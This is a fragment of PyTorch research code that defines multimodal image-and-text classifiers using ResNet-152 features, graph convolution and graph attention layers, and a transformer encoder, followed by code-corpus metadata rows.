self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_5 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_6 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_7 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_8 = Rs_GCN(in_channels=2048, inter_channels=2048)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# # LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear(2048, 2048)
# TEXTUAL FEATURES N X 36 X 2048
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 1024)
self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text2 = nn.Linear(1024, 2048)
# PROJECTION LAYER
if self.args.projection_layer == 'gru':
# GRU VISUAL+TEXTUAL UNDERSTANDING
self.gru_local = nn.GRU(2048, 2048, 1, batch_first=True)
elif self.args.projection_layer == 'fc' or self.args.projection_layer == 'attention':
# FULLY CONNECTED OR ATTENTION
self.bn_projection = nn.BatchNorm1d((self.args.max_textual + self.args.max_visual) * 2048)
self.fc_projection = nn.Linear( (self.args.max_textual + self.args.max_visual) * 2048, 2048)
# FINAL FUSION BEFORE CLASSIFICATION
if self.args.fusion == 'block':
self.fusion = Block([2048, 2048], 2048, mm_dim= self.args.mmdim)
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'mlb':
self.fusion = MLB([2048, 2048], 2048, mm_dim= self.args.mmdim)
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'attention' or self.args.fusion == 'dot':
# ATTENTION or DOT PRODUCT AS FUSION
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'concat':
# CONCATENATION AS FUSION
self.final_bn = nn.BatchNorm1d(2*2048)
self.final_fc = nn.Linear(2*2048, num_classes)
else:
print("Error: Last Layer Fusion selected not implemented")
def forward(self, im, textual_features, sample_size, local_features,text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
# Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
textual_features = self.bn_text1(textual_features)
textual_features = F.leaky_relu(self.fc_text1(textual_features))
textual_features = self.bn_text2(textual_features)
textual_features = F.leaky_relu(self.fc_text2(textual_features)) # SHAPE: N X MAX_TEXTUAL X 2048
# FC for LOCAL Features
GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
GCN_img_emd = torch.cat((local_features, textual_features), dim=1)
# GCN reasoning LOCAL VISUAL + TEXTUAL FEATURES
# GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
# -> B,D,N
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_5(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_6(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_7(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_8(GCN_img_emd)
# -> B,N,D
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = l2norm(GCN_img_emd)
# PROJECT FINAL VISUAL FEATURES (OUTPUT FROM GCN) TO A SPACE DIM: 1 X 2048
if self.args.projection_layer == 'gru':
# GRU VISUAL+TEXTUAL UNDERSTANDING
rnn_img, hidden_state = self.gru_local(GCN_img_emd)
GCN_img_emd = hidden_state[0] # Hidden state of last time step of i layer (in this case only one layer)
elif self.args.projection_layer == 'fc':
# FULLY CONNECTED... NOT ENOUGH GPU RAM
GCN_img_emd = torch.reshape(GCN_img_emd,(sample_size, -1))
GCN_img_emd= F.leaky_relu(self.fc_projection(self.bn_projection(GCN_img_emd)))
elif self.args.projection_layer == 'attention':
# ATTENTION
visual_atnn = torch.bmm(x.reshape(sample_size,1,2048), GCN_img_emd.permute(0,2,1))
visual_atnn = torch.tanh(visual_atnn)
visual_atnn = F.softmax(visual_atnn, dim=1)
# Attention over Global Visual Features
GCN_img_emd = torch.bmm(visual_atnn, GCN_img_emd).reshape(sample_size, -1)
elif self.args.projection_layer == 'mean':
# MEAN VECTOR:
GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
else:
print("Forward pass Error in Projection Layer")
# FINAL CONSTRUCTION OF VECTOR BEFORE CLASSIFICATION
if self.args.fusion == 'attention':
# ATTENTION AS FUSION
visual_atnn = x * GCN_img_emd # Elem-wise mult - Shape: N x 2048
visual_atnn = torch.tanh(visual_atnn)
visual_atnn = F.softmax(visual_atnn, dim=1)
# Attention over Global Visual Features
x = visual_atnn * GCN_img_emd
elif self.args.fusion == 'mlb' or self.args.fusion =='block':
x = self.fusion([GCN_img_emd.view(sample_size, -1), x])
elif self.args.fusion == 'dot':
# DOT PRODUCT AS FUSION
x = x * GCN_img_emd # Elem-wise mult - Shape: N x 2048
elif self.args.fusion == 'concat':
# CONCAT AS FUSION
# Concatenate Global and Local visual feats
x = torch.cat((x, GCN_img_emd), dim=1)
else:
print('Error on forward pass fusion')
x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
return x, attn_mask
class fullGCN_bboxes(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(fullGCN_bboxes, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# GCN reasoning
gcn_dim_size = 2048
self.Rs_GCN_1 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.Rs_GCN_2 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.Rs_GCN_3 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.Rs_GCN_4 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.Rs_GCN_5 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.Rs_GCN_6 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.Rs_GCN_7 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.Rs_GCN_8 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear(2048, 1920)
# TEXTUAL FEATURES N X 36 X 2048
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 1024)
self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text2 = nn.Linear(1024, 1920)
# BBOX POSITIONAL ENCODING OF LOCAL FEATURES AND TEXT
self.bn_encod_bboxes = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
self.fc_encod_bboxes = nn.Linear(4, 128)
# # FC OUTPUT from GCN
# self.bn_out_gcn = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
# self.fc_out_gcn = nn.Linear(gcn_dim_size, 2048)
# PROJECTION LAYER
if self.args.projection_layer == 'gru':
# GRU VISUAL+TEXTUAL UNDERSTANDING
self.gru_local = nn.GRU(2048, 2048, 1, batch_first=True)
elif self.args.projection_layer == 'fc' or self.args.projection_layer == 'attention':
# FULLY CONNECTED OR ATTENTION
self.bn_projection = nn.BatchNorm1d((self.args.max_textual + self.args.max_visual) * 2048)
self.fc_projection = nn.Linear( (self.args.max_textual + self.args.max_visual) * 2048, 2048)
# FINAL FUSION BEFORE CLASSIFICATION
if self.args.fusion == 'block':
self.fusion = Block([2048, 2048], 2048, mm_dim= self.args.mmdim)
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'mlb':
self.fusion = MLB([2048, 2048], 2048, mm_dim= self.args.mmdim)
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'attention' or self.args.fusion == 'dot':
# ATTENTION or DOT PRODUCT AS FUSION
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'concat':
# CONCATENATION AS FUSION
self.final_bn = nn.BatchNorm1d(2048 * 2)
self.final_fc = nn.Linear(2048 * 2, num_classes)
else:
print("Error: Last Layer Fusion selected not implemented")
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
# Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
textual_features = self.bn_text1(textual_features)
textual_features = F.leaky_relu(self.fc_text1(textual_features))
textual_features = self.bn_text2(textual_features)
textual_features = F.leaky_relu(self.fc_text2(textual_features)) # SHAPE: N X MAX_TEXTUAL X 1920
# FC for LOCAL Features
GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
# FC for Visual and Textual BBOXES
bboxes_feats = torch.cat((local_bboxes, text_bboxes), dim=1)
bboxes_feats = self.bn_encod_bboxes(bboxes_feats)
bboxes_feats = F.leaky_relu(self.fc_encod_bboxes(bboxes_feats))
# CONCAT LOCAL FEATURES AND TEXTUAL FEATURES
GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
# CONCAT EACH BBOX AT THE LAST COLUMN OF TEXTUAL AND VISUAL FEATURES
GCN_img_emd = torch.cat((GCN_img_emd, bboxes_feats), dim=2)
# GCN reasoning LOCAL VISUAL + TEXTUAL FEATURES
# GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
# -> B,D,N
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd, __ = self.Rs_GCN_1(GCN_img_emd)
GCN_img_emd, __ = self.Rs_GCN_2(GCN_img_emd)
GCN_img_emd, __ = self.Rs_GCN_3(GCN_img_emd)
GCN_img_emd, __ = self.Rs_GCN_4(GCN_img_emd)
GCN_img_emd, __ = self.Rs_GCN_5(GCN_img_emd)
GCN_img_emd, __ = self.Rs_GCN_6(GCN_img_emd)
GCN_img_emd, __ = self.Rs_GCN_7(GCN_img_emd)
GCN_img_emd, affinity_matrix = self.Rs_GCN_8(GCN_img_emd)
# -> B,N,D
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = l2norm(GCN_img_emd)
# GCN_img_emd = self.bn_out_gcn(GCN_img_emd)
# GCN_img_emd = F.leaky_relu(self.fc_out_gcn(GCN_img_emd))
# PROJECT FINAL VISUAL FEATURES (OUTPUT FROM GCN) TO A SPACE DIM: 1 X 204
if self.args.projection_layer == 'gru':
# GRU VISUAL+TEXTUAL UNDERSTANDING
rnn_img, hidden_state = self.gru_local(GCN_img_emd)
GCN_img_emd = hidden_state[0] # Hidden state of last time step of i layer (in this case only one layer)
elif self.args.projection_layer == 'fc':
# FULLY CONNECTED... NOT ENOUGH GPU RAM
GCN_img_emd = torch.reshape(GCN_img_emd,(sample_size, -1))
GCN_img_emd= F.leaky_relu(self.fc_projection(self.bn_projection(GCN_img_emd)))
elif self.args.projection_layer == 'attention':
# ATTENTION
visual_atnn = torch.bmm(x.reshape(sample_size,1,2048), GCN_img_emd.permute(0,2,1))
# pdb.set_trace()
# visual_atnn = torch.tanh(visual_atnn)
visual_atnn = F.leaky_relu(visual_atnn)
visual_atnn = F.softmax(visual_atnn, dim=2)
# Attention over Global Visual Features
GCN_img_emd = torch.bmm(visual_atnn, GCN_img_emd).reshape(sample_size, -1)
elif self.args.projection_layer == 'mean':
# MEAN VECTOR:
GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
else:
print("Forward pass Error in Projection Layer")
# FINAL CONSTRUCTION OF VECTOR BEFORE CLASSIFICATION
if self.args.fusion == 'attention':
# ATTENTION AS FUSION
visual_atnn = x * GCN_img_emd # Elem-wise mult - Shape: N x 2048
visual_atnn = torch.tanh(visual_atnn)
visual_atnn = F.softmax(visual_atnn, dim=1)
# Attention over Global Visual Features
x = visual_atnn * GCN_img_emd
elif self.args.fusion == 'mlb' or self.args.fusion =='block':
x = self.fusion([GCN_img_emd.view(sample_size, -1), x])
elif self.args.fusion == 'dot':
# DOT PRODUCT AS FUSION
x = x * GCN_img_emd # Elem-wise mult - Shape: N x 2048
elif self.args.fusion == 'concat':
# CONCAT AS FUSION
# Concatenate Global and Local visual feats
x = torch.cat((x, GCN_img_emd), dim=1)
else:
print('Error on forward pass fusion')
x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
return x, attn_mask, affinity_matrix
class GAT_bboxes(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(GAT_bboxes, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# GCN reasoning
gat_dim_size = 2048
# num_nodes = (36,15) # Visual features = 36 + Textual features = 15
# self.Rs_GCN_1 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# self.Rs_GCN_2 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# self.Rs_GCN_3 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# self.Rs_GCN_4 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# self.Rs_GCN_5 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# self.Rs_GCN_6 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# self.Rs_GCN_7 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
# self.Rs_GCN_8 = Rs_GCN(in_channels=gcn_dim_size, inter_channels=gcn_dim_size)
self.layer_1 = GATLayer(in_features = gat_dim_size, out_features = gat_dim_size)
self.layer_2 = GATLayer(in_features = gat_dim_size, out_features = gat_dim_size)
self.layer_3 = GATLayer(in_features = gat_dim_size, out_features = gat_dim_size)
self.layer_4 = GATLayer(in_features = gat_dim_size, out_features = gat_dim_size)
self.layer_5 = GATLayer(in_features = gat_dim_size, out_features = gat_dim_size, concat=False)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear(2048, 1920)
# TEXTUAL FEATURES N X 36 X 2048
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 1024)
self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text2 = nn.Linear(1024, 1920)
# BBOX POSITIONAL ENCODING OF LOCAL FEATURES AND TEXT
self.bn_encod_bboxes = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
self.fc_encod_bboxes = nn.Linear(4, 128)
# # FC OUTPUT from GCN
# self.bn_out_gcn = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
# self.fc_out_gcn = nn.Linear(gcn_dim_size, 2048)
# PROJECTION LAYER
if self.args.projection_layer == 'gru':
# GRU VISUAL+TEXTUAL UNDERSTANDING
self.gru_local = nn.GRU(2048, 2048, 1, batch_first=True)
elif self.args.projection_layer == 'fc' or self.args.projection_layer == 'attention':
# FULLY CONNECTED OR ATTENTION
self.bn_projection = nn.BatchNorm1d((self.args.max_textual + self.args.max_visual) * 2048)
self.fc_projection = nn.Linear( (self.args.max_textual + self.args.max_visual) * 2048, 2048)
# FINAL FUSION BEFORE CLASSIFICATION
if self.args.fusion == 'block':
self.fusion = Block([2048, 2048], 2048, mm_dim= self.args.mmdim)
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'mlb':
self.fusion = MLB([2048, 2048], 2048, mm_dim= self.args.mmdim)
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'attention' or self.args.fusion == 'dot':
# ATTENTION or DOT PRODUCT AS FUSION
self.final_bn = nn.BatchNorm1d(2048)
self.final_fc = nn.Linear(2048, num_classes)
elif self.args.fusion == 'concat':
# CONCATENATION AS FUSION
self.final_bn = nn.BatchNorm1d(2048 * 2)
self.final_fc = nn.Linear(2048 * 2, num_classes)
else:
print("Error: Last Layer Fusion selected not implemented")
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
# Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
textual_features = self.bn_text1(textual_features)
textual_features = F.leaky_relu(self.fc_text1(textual_features))
textual_features = self.bn_text2(textual_features)
textual_features = F.leaky_relu(self.fc_text2(textual_features)) # SHAPE: N X MAX_TEXTUAL X 1920
# FC for LOCAL Features
GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
# FC for Visual and Textual BBOXES
bboxes_feats = torch.cat((local_bboxes, text_bboxes), dim=1)
bboxes_feats = self.bn_encod_bboxes(bboxes_feats)
bboxes_feats = F.leaky_relu(self.fc_encod_bboxes(bboxes_feats))
# CONCAT LOCAL FEATURES AND TEXTUAL FEATURES
GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
# CONCAT EACH BBOX AT THE LAST COLUMN OF TEXTUAL AND VISUAL FEATURES
GCN_img_emd = torch.cat((GCN_img_emd, bboxes_feats), dim=2)
# GCN reasoning LOCAL VISUAL + TEXTUAL FEATURES
# GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
# -> B,D,N
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
nodes = 51
adj = torch.ones(nodes)
import pdb; pdb.set_trace()
# GCN_img_emd, __ = self.Rs_GCN_1(GCN_img_emd)
# GCN_img_emd, __ = self.Rs_GCN_2(GCN_img_emd)
# GCN_img_emd, __ = self.Rs_GCN_3(GCN_img_emd)
# GCN_img_emd, __ = self.Rs_GCN_4(GCN_img_emd)
# GCN_img_emd, __ = self.Rs_GCN_5(GCN_img_emd)
# GCN_img_emd, __ = self.Rs_GCN_6(GCN_img_emd)
# GCN_img_emd, __ = self.Rs_GCN_7(GCN_img_emd)
# GCN_img_emd, affinity_matrix = self.Rs_GCN_8(GCN_img_emd)
GCN_img_emd = self.layer_1(GCN_img_emd, adj)
GCN_img_emd = self.layer_2(GCN_img_emd, adj)
GCN_img_emd = self.layer_3(GCN_img_emd, adj)
GCN_img_emd = self.layer_4(GCN_img_emd, adj)
GCN_img_emd = self.layer_5(GCN_img_emd, adj)
# -> B,N,D
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = l2norm(GCN_img_emd)
# GCN_img_emd = self.bn_out_gcn(GCN_img_emd)
# GCN_img_emd = F.leaky_relu(self.fc_out_gcn(GCN_img_emd))
# PROJECT FINAL VISUAL FEATURES (OUTPUT FROM GCN) TO A SPACE DIM: 1 X 204
if self.args.projection_layer == 'gru':
# GRU VISUAL+TEXTUAL UNDERSTANDING
rnn_img, hidden_state = self.gru_local(GCN_img_emd)
GCN_img_emd = hidden_state[0] # Hidden state of last time step of i layer (in this case only one layer)
elif self.args.projection_layer == 'fc':
# FULLY CONNECTED... NOT ENOUGH GPU RAM
GCN_img_emd = torch.reshape(GCN_img_emd,(sample_size, -1))
GCN_img_emd= F.leaky_relu(self.fc_projection(self.bn_projection(GCN_img_emd)))
elif self.args.projection_layer == 'attention':
# ATTENTION
visual_atnn = torch.bmm(x.reshape(sample_size,1,2048), GCN_img_emd.permute(0,2,1))
# pdb.set_trace()
# visual_atnn = torch.tanh(visual_atnn)
visual_atnn = F.leaky_relu(visual_atnn)
visual_atnn = F.softmax(visual_atnn, dim=2)
# Attention over Global Visual Features
GCN_img_emd = torch.bmm(visual_atnn, GCN_img_emd).reshape(sample_size, -1)
elif self.args.projection_layer == 'mean':
# MEAN VECTOR:
GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
else:
print("Forward pass Error in Projection Layer")
# FINAL CONSTRUCTION OF VECTOR BEFORE CLASSIFICATION
if self.args.fusion == 'attention':
# ATTENTION AS FUSION
visual_atnn = x * GCN_img_emd # Elem-wise mult - Shape: N x 2048
visual_atnn = torch.tanh(visual_atnn)
visual_atnn = F.softmax(visual_atnn, dim=1)
# Attention over Global Visual Features
x = visual_atnn * GCN_img_emd
elif self.args.fusion == 'mlb' or self.args.fusion =='block':
x = self.fusion([GCN_img_emd.view(sample_size, -1), x])
elif self.args.fusion == 'dot':
# DOT PRODUCT AS FUSION
x = x * GCN_img_emd # Elem-wise mult - Shape: N x 2048
elif self.args.fusion == 'concat':
# CONCAT AS FUSION
# Concatenate Global and Local visual feats
x = torch.cat((x, GCN_img_emd), dim=1)
else:
print('Error on forward pass fusion')
x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
mock_affinity_matrix = np.zeros(1)
mock_affinity_matrix = torch.from_numpy(mock_affinity_matrix).cuda()
return x, attn_mask, mock_affinity_matrix
class transformer_net(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(transformer_net, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear(2048, 1920)
# TEXTUAL FEATURES N X 36 X 2048
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 1024)
self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text2 = nn.Linear(1024, 1920)
# BBOX POSITIONAL ENCODING OF LOCAL FEATURES AND TEXT
self.bn_encod_bboxes = nn.BatchNorm1d(self.args.max_visual + self.args.max_textual)
self.fc_encod_bboxes = nn.Linear(4, 128)
# TRANSFORMER
# create conversion layer
hidden_dim = 2048
# self.conv = nn.Conv2d(2048, hidden_dim, 1)
nheads = 8
num_encoder_layers = 6
num_decoder_layers = 6
# create a default PyTorch transformer
# self.transformer = nn.Transformer(hidden_dim, nheads, num_encoder_layers, num_decoder_layers)
encoder_layer = nn.TransformerEncoderLayer(hidden_dim, nheads)
self.transformer = nn.TransformerEncoder(encoder_layer, num_encoder_layers, norm=nn.LayerNorm(normalized_shape=hidden_dim, eps=1e-6))
# output positional encodings (object queries)
# self.query_pos = nn.Parameter(torch.rand(self.args.max_visual + self.args.max_textual, hidden_dim))
# spatial positional encodings
# note that in baseline DETR we use sine positional encodings
# self.col_embed = nn.Parameter(torch.rand( self.args.max_visual + self.args.max_textual , hidden_dim))
# self.col_embed = nn.Parameter(torch.rand(50, hidden_dim // 2))
# # FC OUTPUT from TRANSFORMER
self.bn_out_transformer = nn.BatchNorm1d(2048)
self.fc_out_transformer = nn.Linear(2048, 2048)
# FINAL CLASSIF
if self.args.fusion == 'concat':
# CONCATENATION AS FUSION
self.final_bn = nn.BatchNorm1d(2048 * 2)
self.final_fc = nn.Linear(2048 * 2, num_classes)
else:
print("Error: Last Layer Fusion selected not implemented")
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
# Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
textual_features = self.bn_text1(textual_features)
textual_features = F.leaky_relu(self.fc_text1(textual_features))
textual_features = self.bn_text2(textual_features)
textual_features = F.leaky_relu(self.fc_text2(textual_features)) # SHAPE: N X MAX_TEXTUAL X 1024
# FC for LOCAL Features
local_features = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
# FC for Visual and Textual BBOXES
# import pdb;pdb.set_trace()
bboxes_feats = torch.cat((local_bboxes, text_bboxes), dim=1)
bboxes_feats = self.bn_encod_bboxes(bboxes_feats)
bboxes_feats = F.leaky_relu(self.fc_encod_bboxes(bboxes_feats))
# CONCAT LOCAL FEATURES AND TEXTUAL FEATURES
local_features = torch.cat((local_features, textual_features), dim=1)
# CONCAT EACH BBOX AT THE LAST COLUMN OF TEXTUAL AND VISUAL FEATURES
# import pdb; pdb.set_trace()
local_features = torch.cat((local_features, bboxes_feats), dim=2)
# local_features = local_features.permute(0, 2, 1)
# TRANSFORMER LOCAL VISUAL + TEXTUAL FEATURES
# construct positional encodings
# input_batch = local_features.shape[0]
# pos = self.col_embed.repeat(input_batch, 1, 1)
# pos = bboxes_feats
# query_pos = self.query_pos.repeat(input_batch, 1, 1)
# propagate through the transformer
# local_features = self.transformer( pos + local_features, query_pos)
local_features = self.transformer(local_features)
# local_features = local_features.permute(0, 2, 1)
local_features = torch.mean(local_features, dim =1)
local_features = self.bn_out_transformer(local_features)
local_features = F.leaky_relu(self.fc_out_transformer(local_features))
local_features = l2norm(local_features)
x = torch.cat((l2norm(x), local_features), dim=1)
x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
mock_affinity_matrix = np.zeros(1)
mock_affinity_matrix = torch.from_numpy(mock_affinity_matrix).cuda()
return x, attn_mask, mock_affinity_matrix
| 41.822626
| 141
| 0.630957
| 10,343
| 73,566
| 4.256309
| 0.032582
| 0.031075
| 0.046612
| 0.0169
| 0.915635
| 0.905072
| 0.895464
| 0.890148
| 0.881925
| 0.872158
| 0
| 0.053084
| 0.263287
| 73,566
| 1,758
| 142
| 41.846416
| 0.759193
| 0.168475
| 0
| 0.78785
| 0
| 0
| 0.018171
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03271
| false
| 0.005607
| 0.013084
| 0.000935
| 0.091589
| 0.011215
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86ca6ae5dc79204d8e9b7107f2737e917d834899
| 9,928
|
py
|
Python
|
packages/syft/tests/syft/lib/tenseal/tenseal_ckksvector_test.py
|
exityan/PySyft
|
35166c487a5be57f9ad28929ed88a8ba6bdd5aeb
|
[
"Apache-2.0"
] | 1
|
2020-08-01T08:23:54.000Z
|
2020-08-01T08:23:54.000Z
|
